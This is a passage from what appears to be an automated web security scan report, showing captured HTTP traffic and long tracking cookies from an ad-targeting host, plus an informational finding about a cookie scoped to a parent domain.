rtc_622X=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; rsiPus_J1Ps="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M95/hpep6F9WP6iKbjeS1EvCK92Nbm9koSICuntVw+Exyr8hrY3p+tiPYVuHjbiuwbdCMPojMqN6pZ8Di7qxn0z+u24oT+sQhXqf/LqomtRQQp2k/0kgZGM0E0rgfJji0G5na7Hx6NHvIkL7O13oClrmlSq5dR14nZXjYbL9mGjs2Z8h4rnWI3CTFcmVIcLde0CfSbvzoRXHNT+CbX5EUr6xlNn5wNCKffxViImEMltLK1Z1+YkwQf/V8i1qRR4ugdgQJoJHeUym7bzQY6Pqh9ngw8/KB07EKWA8skQosTK92onucvcf1pY2eAkHrjKLBg4megt3jtPaVvZE1CjSI6aFvDqBuvNOoYsYl0QMxJwilr5KMtB+1ZIyjwWpFoNOm/u3x9y9w6vwm8ClMosuFpb6NKGeb7SE++jbk+ikH9udHII8PDoHPCR4xe2gZMsZ/PPyEW3wh/7YUpgdWf1QcVjXt8WfeoIiSAQmiTarNTmWqkEhG6TU4EFQQ0pk/9WyI4uxTKXQclZjXhbsVRyOEsep5WCKmbUF6xaucVujihxwsAgtX725fyLOMFhsnS65oV+LwO/zFrIdaIBMnZVp8I+Ww2rWLiA5JTO1ocxfLTFCj6UPxG0ox9V/CdWg0tp1ND7HaLT7mY+VVsU+HUk0nJFyAkN4OsnDaHtI1TFPiDzyQ7wlXjEVxtHvxO71tFWdlux23JVBwL/o/6VJXoUL0ccqYT1Th2bq7NuYAlc0fL3IfZwakq5fGoaso7R1Duet5IYT+j8xStey4WBJCYrFVDHnXot1AbT9YEqs2BNsj3BZcXBYi0O0qPDI0HmNf2EYnH81ruOA5CGvX6mH7vCFoYKZS/9p7R3pffzbrXjQPcgR6HsN2oikvaux4oAXdbHQZLAq9m1VZlUxriq4jAIFtnyvSVeNwt7i4akKnDujJYU9ZkI12qoTqF67Xk1usO2dtWltsQIwovXGN+DnpnaN4jo+XZTHAuoI9I5+XEK/Spf3sZoJyCFFfawdJk3OcbrJy38Vl2kK3T9RnQAOPHtujBtZlECpIwPkKnWbX+xsTF9257JxpiajYBXbun0dzjwI+dPIaE12xV2JwN0VjfL5f3/yuosBB3QMuZRKHCWcFuMIMmmVE/iudLUTgaomEhGu5LhKwJEGT+uDq/WPU3dy7QCr/MmedbUut4vRz4jRQx/oRKsNgzBeVM0lF7vZcCsSFWp+2oXWcXIn5MQ+3PCeNCw/QdE9/i9rW51wGEJyA7EHMC20nBW2EuLmF/2MO0/Qb37AgH5OzNFx/EOCweAh9VF2E5Tl4KT3qdPsYzfBw=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8q/n8RHJiFTfZ++5QwruBibDv6FE0by7wXSZvEeljrlKA98siyq3Iu7CibeLMzFcjc+XySfJME1eMtfn1idKONNeKNYPAsXENKfgfBjApfYCk7aZFhznJTa1s1u1FOci9koP6Sx3nrl8wxPVHTz3xcdt54Y16O4URQL3+Dqo9Ak2xoXYiu4cEQYeSALOIxbuoBEcdF+zv0NVt2bE5qKigYI9NGu3RNegPZ+MrPeE6XID4np8LnyqV4r8J4W6/M6/Pq+FM++RPnBI6sUGWdSFOBYmSgo0Gp9yS0l9fvaTKyPlCiMtaiszY38tigK9viFa/+HoKkWB4Aowhx48DKSIqsQsg0UYDjaqK95XqLBS91uurAbXZI5ax1yOA1b/0N+Ps0MDGPYbB2y+yQqCU/rFiNveJEpl13aWydnAaSO62cXVJCSPPwUXcd5Llron2TewxkUnmdYIL3tH393wXrp1ICMKLzxpzGsmT/WhH/aXvAKqFEPUThptHzt2tLwowGdrzCc399wWM6lsV1+fo6PPRMGeZo3OFodDI2cjGBrJTBJyT3nreFca+VR5Z3HjjKjWFbqVZybsn0ZYVB7LNEmgyiPfhzdRR6bWkjNJwozmOc3fvsB1Y/+m15Q7vMqmF35Aj1sQLs+RhfBU5mqTUiKwQARrgp4i7uj1WoUKOtXQeaMxLYuK+Z6EPwy3OLFS+D9EqVq3/bLE6sv9BDQKAQzOjLOgR/FJWzpTJKYrQuByi1kJICahjNh+sK7F9uFNParIk3qJosYR2M1h5gmiwt26uVxKxPCXzhSt8acvjbE9e0CNFd2ywq9abeJC+88sIdo1XRtcBY8juUWW6icPR3Taxs4hhNqKNuXaw2WfQc2FPpK6TTRYMbv/tjS2J9GxPBRtoBb2JmpjEQ2c0E4Zih6GYCVWT2QdegbRFaICdC+l/vKzbHrKq0VGMBifZSmcJO4CPCjVY//F9DAa8+m3o+aWkBixpV7hYle8QBrO9MuE0/1fYyjJ+G/CtrBRFzYvfrmJjjQcZzs00z0WZxuhjS47hSaXZfWhziYSHbJjT8cUj1iBkjdX/AASphUrlvAKXosmxJDyselObM5LIGmtaNSuhHEQvKVhGZC2pdIm/Wii1tB3bm5mdlmK6Bst1rba5Kcw7iSTgwrRuwyjLdPSUEMphnyGsMyoOlKuGS4X2+hua4ZwVGZkF4jBAErDj4Oz2qiqAn99Uol/dhEnZSHVS1E8ARXWvGCCA+RvvolvmtApuUilLszFDQRj3KG+mcJ7QfhywkpmDlJibpOItIQioGZoVtHURlf/MZNqen6aIs3wfHfnL6FcrxYnYbyXrCRfZTgZPJ40+EUNqtkROWz4ZE9qPj16OJLaVuIljvS7l4Lkw+Xh5BUmnF+VFde/nBTvdF8CVrgPXnvvalZTsmyVf/sh/nvqomW23mnwe5B4XqY5ZAJZXDpJ3QS9rd33I1VhizTY6RcXrBiO/AanIGY2V/5GdMzfdR2tIGrbO4kUVYZhakJuOVvP7IQ7IVx9VH/GTD0NMPjUlz/DZuG1vO21gynVk/WjFsT4K/wOj3On8yme8RI91ks5rMdmyMVUPllKwO+skJq+e3sYhWMA/rgjengHFfZGEsddyhIDqNgNbPFqxjzO560mi1TZaKiOhtlMnLsD0p+GDqJqx3gXLG6Y3xufmqmQ1xbrv3IvWDkF3j1KJdfzaFE6vvuBd3WDs5s/knN74PD2jD5c+QzhqB6zZhNDQDSzHmjsENXB"; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vLj+wWQEAWvERBw6jjPQ4L4Uubk0NaY9wI2qrKXBEJqalRFyzz++kuS0t8FA35bmxx0VW/Jj5TEabtOAJFHV+aNKdWI3SWQJ9jz0Bw9jAtbfMu/qQH+JwD1NWyRhr+2kr+wlN2b1z5lAdiCkUa0tKYvCvYcqJvNr2DqByz/F0Ze5jELYXL3x8itdY0emgWJ2XC0fv5Yk85wiLftX2kNls2m1a/QL77fmAuHZLb+6z2vaDFz9Bxg1gZz2wTmJDmQXDPY3ZU61xA0KbuMJP+Xg4+ELLUf3U9nM/6isRZRPWo00znvVe3VskS7JmRrG4N6quqIOoCow/0O9kwRCosTrplWWmSEeYcC91z1c6T356RS2BRyVIHmXG5N6g1HmHSUGEMlIm8kB2+kwdMHjYoHPEHBUzO+KA6xjX9kaVSObtWvl8I9hp4IH7INgoU0CqOXi3F+vpXp05vy1a0Gdu/YEMEhA9X1V6LPwYpJHy0RNOuW20v/EZYJVeis/HFfBAwziebnsDLykWCVBKnvPkMz43mHCw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rsB4rOfq5QsJKQ25ayViGymJW18v6oxo5TQQ/CGgK6H8il2W9QBKJhTycj5xS4V0a4TNPNDPv1QWh8gkmOOsH9rraddoccklFmNdAYOTGYvtIJB6bP4P6/Il+5XrH+SP65GfIkcTktT+ixZsRa1DGnHu9HmUsTwsj+b4TSHPCO16C76Jgxbq9AgilVXSOe7YLMp6xwab1BrpZaOWmsitT5dU9IfLwuNg89QDwPBAC4ur48OcOcA1xi2GVNLDOnn9+ZVEkHb0IOQppkywim9r6oMCsyGp5QINfekp4OAtoWFhe8LaMNd0oNIrrqTsPSnLC9jHHtZCIc3jQS5IOTrrEInfpEWiCeiIahqNuFuKBQ4qweMCtY2r/KLXEYgCpNCMa/33M1Me2skHCgHAZdUYutFVDjHY8aZA3RQeILFC3MEFNa5BpNqaDlanI5eI8Z1cnxxtC4vTtpm6rHLBHrTrq/n/HqXwP/lHd+mEVwBG90W93W0aM1bW2AmFNr9jZUSYx0WIrLl9aQ0nBEt+ud5w7ywePV9vyQTYia6nuRVrI7yWGmvWLeiMUNeSXFaR32t1Om8q1dSr7ZIhW/DF8cZk+Q7Jz1CGHE6bVWqfEeqNOPhxoxmC/yS0id7nsNMi58LqbR9vXG4DhGiHEw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:09:22 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 12:09:22 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.214. http://pix04.revsci.net/I10985/b3/0/3/1008211/978202705.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/978202705.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOheXIQT7uItGF29/yo/tk8g7ZPQt8El+O6vsJSum2NB/leM3NskvAjloepK63+nuNJXDsrq4xoUabTBovG12bYtsNz7Ao3U4T4c828xyLWWNlcMSklFjL3l2VgeOKC+J5znJwPRxJOUJBXR9BOb0in8rTuPvTzdZZfAePiWl5LSsogNJomDCF3VwWHhUno5GVPQlsUYnsmKo93ec3l97uRk+XFTftWQe+LFw0ydkk7nzYWQa2594W8VhRHY8hMTkLA+ebbmK6C9cu0L9eiewtsiV114KM6xywZeLfwtrBBWC6wXH4EiQ60ZtZ9HjC65us4EZtryH4d89UJuHuI2+Pj0TLKI7o6DzI9QVfQwgAvQ8pOissEUSF4PlTW84QuxfJUnBabEg3/LDlToXvABg1h+tm66pzNl7K4zty3avS9TQkjyPXb4prWAJZ2EJkRmrkZexi3ZQMvHJ0ZtyNv/CzYfZ4oS/mBuqs3BkTI0c9KWNC+jFwp2RGN4K+YxJpJj4RWgZvpx9SgHo7xrptyFxQDiBbF5vtksKQ/9jsq5u1tJ8Wi87OdhAm/aYKqdei0ZS9nNgSfG3Vc1cS/Koxt2e+5/nJiB06achvUFqhmTPbVqtERJt85jcH97w4hNkdQpdMbyvMW9Xi9V7j/Qxckcv09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:19:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/978202705.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_q0k0="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9RC0SyMoveM9OR5om4StALLEl9sEMKhnxvCqNxuQAmK7MhFn371MBxbkmGyPMtu4lgXhwItrNoqz2GlsuNKUlMx7ekfnlMTFanFw84KgBQC9I2P+pzHq7AtUd7iRRhRSL5587N2q2CgAZGM98td8nxiyOfQ3hVMhAXuYylxITfJSd3sJpCJhDD72wpTJy1Q3nVPVmJ258TJD6LscZZn+PwENyJTkRZ4/PQ2/zz2hISNVyE9hRFkaZ7q66Yh6x/Dm9/3y9yBozFlsFzkuj1n6+QXaI7zyq0k4yxXvRiUE5e7iQbxVHz+0kf+STkoB0XBdRhP1e9yW2x6RVyRWdeibvzJZfhI2Bc22JFV9c7O6jOm20AkpFuZWpU6MSAtgWPJZa4yAg2W/x3pCgEIatQztqIQw9OBXRzAy33sN0cujeNSq9yi5yPW9vCLzdmgS+vfh45vywQvGb7ONTjXQSYupwlEN/Ov6JV8dVN0Gk7Q4FfphQCfEmxx4aJlUvVna42rauzD+suCjrSqXUyNiRZa//iFuAu/7KLhId1cw0PzIle5vCNIVgQ7PXZn378Wa9yiliXxQWly5Lj6XyrmY3kmD6BIM3xxJsewaMAWqGSLVbsqV7hjKUtWgyhvuuWYE4TbnuY/rabVIZ53rcFgTQJE5Kpi6i+C6AJYe0QWjc8XQXwujxhDKME2Fvy7p0cIet2MYu2M4KeEjfCXKLppgbcz+HHcwBwQ4Fc4KxMykGgl7Mdk3I0LXk+u/ZHoAxsPjuoLHbcs5x+XWN1Ml6mrlrFJPNUf5flg2fgaLsok7dEKSWHa/VBZjTv0KvC1d8RfKkJIervFPn1PMoukM69Msj4y0Oq98dg8Mf6Jmvdk2Jd3ng3X6VRKlQRLRELGH9a83KldPKdbwsh8j31xplYINURZ8cNywToMfJlR8R/HvxdSTNOTERTjJiguQlDuFoYuZVNbIN14Ht9Szm6KsTDQZN/obogJsImNeNiwPGnZC++IAEOf/oKNxzKOnkJCC6leyVKPpcSeNxSWSCcsLUpj16XKnhnbstrQSHPEMmupokNuxDVf1eivevcBlqtcOQkQMJv36XWVkxSggr/1fOlKezfQECeUQcfAhDrtAQmHs6r0O+bEMkQKslfsYAfX2jIV8vGtlW0oU4GRRcm4jZwMYSA5gmKWHtKO77R9ZpjuVeDHD48Wb5VQhHvqth5WiJW2hGeWCzL+lBSXIpNgvpTSCmy89+f4lzRZkxxb6EUmoORGn2JoXPP8Xpbq9P3D2eyxZGu69ACjqqXYJKamLKTu8MyYpl+DAp8XrNDwh1HfJ/4FKy5vca1d5rLEuXEg=="; 